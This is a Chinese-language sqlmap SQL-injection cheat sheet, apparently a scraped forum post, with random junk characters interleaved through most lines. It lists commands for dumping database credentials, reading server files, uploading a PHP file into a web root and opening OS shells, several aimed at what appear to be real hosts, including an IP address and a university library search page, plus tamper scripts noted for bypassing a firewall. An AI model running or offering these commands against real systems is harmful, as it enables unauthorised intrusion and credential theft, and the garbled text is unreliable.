/pentest/database/sqlmap5 J0 u; Y* k `. R
$ J) k8 c6 A( E0 j" Qupdate :::::> in the folder after execute following order : svn update
! M: b, ~6 [" q" u9 k0 h. r' h" {* w8 U/ D9 Y
sqlmap.py -r 1.txt --current-db
3 A* s2 ]! Z5 u( j" V2 r: d# r- l3 l2 m+ v; D+ _+ e
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py” c: c) D9 |: S6 i2 l+ y8 \8 L
6 V& V3 Y" Z9 B==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
' Q- a2 L2 |. E猜解数据库+ Q. i- h- a3 f2 _, A2 u- k9 N
./sqlmap.py -u "injection-url" --dbs0 h" ?) S% P3 l, f# x
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
; L* ?, ^1 d6 h; Z) ~2 }) R
( N; _. Z, i _% s( N猜解表名- }( O) d$ v( t G/ N* N% ~* |2 C* C
./sqlmap.py -u "injection-url" -D database_name --tables
. a+ I- q0 N$ i% y/ I J
' I$ [. |) u6 Q, vsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"9 \ X' Q+ } k. U( r1 o
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" : I+ l' X* p; Q4 s
8 e! M4 ]8 l' Z, wsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump$ `! U! r1 N9 h
; @+ Y- F3 D2 R, _8 p
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
) p: ~/ A1 p& q% _# ]9 U1 Csqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"; Q% e8 h! n5 a! E9 C
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" # _' z5 I3 y4 n ]1 f: T# X
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
/ p" d3 ]" E6 x1 F+ e* q# w% T! x G# O; \3 N( f
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
. c2 p6 N5 |$ a" Z' zsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
; `) G" r6 Z' H! V. [9 P+ asqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
7 v, s! o. y$ p5 z" r8 Z, esqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
2 A5 ]5 E9 F5 G3 qsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump7 G/ z9 t+ ^7 ]3 h' t6 v) V
, v6 N0 r/ c0 w2 `0 Msqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了: X M) Q0 b% E' R
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
3 I& X q! \& f# a8 J9 F. e9 n& |' G
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"0 ]" W* f6 A1 T6 B0 T) G3 s5 F4 Z0 V
猜解列名
9 I: _- i1 W0 g: k./sqlmap.py -u "injection-url" -D database_name -T table_name --columns- t3 A1 M: ]% l) N1 @
# k. R% v) G! ?, j2 O
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( K/ M' x( ^9 Y: D7 {sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
. @( N( K9 c' M* Z* A4 [( m! C5 isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
6 R9 B! y/ n$ \+ p) P; \! ^, s$ y( b3 Q/ c; f4 L
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
% i- c3 T4 U- P' t7 \, ]&submit=Go
8 t! o& Z- V! T: x- l! l猜解值
( \* P/ @& f$ Y# j4 g./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
z0 C" N3 [0 G========================================================
+ E' R5 [6 F- q& D搜索表名中包括mana字符的
. f6 y; `# ?! t3 J4 _+ p/sqlmap.py -u "injection-url" -T mana --search r' H7 d" E) G, k& `3 w
返回一个交互式sql shell
% ]/ p9 y4 n+ z. j8 w, L" ?# H/sqlmap.py -u "injection-url" --sql-shell4 D' E9 v/ k5 L. j
读取指定文件(需权限). Y% H5 b; U$ O/ C' q
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"+ s7 L; ?6 y4 q ]1 c& s2 e
查看当前 用户 及 数据库 5 S* t! g$ r+ _+ W
/sqlmap.py -u "injection-url" --current-user --current-db+ w; E4 h7 [4 w! K
本地文件 写入 远程目标绝对路径- J8 @. A2 h7 r' }
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
- \& u8 r" s) Q% W% o3 Lsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
* j" n+ c f7 G/ c- v3 k
1 e x) d0 o2 H" m+ n9 g0 Asqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
- b6 `+ F8 b# ?/ _" @1 D查看某用的权限
) Y' n6 z' `% A; h/sqlmap.py -u "injection-url" --privileges -U root
5 U" U7 r9 U5 l3 M3 _查看当前用户是否为dba
2 d" _3 ^6 X2 g' d) q: }/sqlmap.py -u "injection-url" --is-dba
7 x+ Y! ^ V8 O. p2 D2 p6 X6 L读取所有数据库用户或指定数据库用户的密码
3 i$ s' A! i) w$ Q2 X Zsqlmap.py -r 1.txt --users --passwords
- s ~ d( v' C1 |2 z! Zsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
6 E8 `$ T; n3 }4 D; Y0 Y
' v8 S. }4 E# g: s/sqlmap.py -u "injection-url" --passwords -U root: g: w4 m; H, S- Z' U6 k# Y7 W" D
( f! y4 }, l" d1 | K2 C r/ m1 z
--start&&--stop 与 --first&&--last 的区别6 J( i4 c I/ m" T% o9 E( U- C3 k
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
: s( @: @! @! Z0 B
8 r; _" ^. q4 b+ L, ^+ U( `从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt); G* P3 y/ x7 q" V) m {8 r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
! i6 H/ Y; `8 [# l9 |% R/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
1 `; j& l/ G, i5 @# E" m+ R- ?% P0 P- W& p% `7 Q" J9 B" W
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% S# C1 w. X" q* }8 I$ R( t/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip": J2 J% s3 B- ?6 }
F6 p; ^+ c6 S+ j |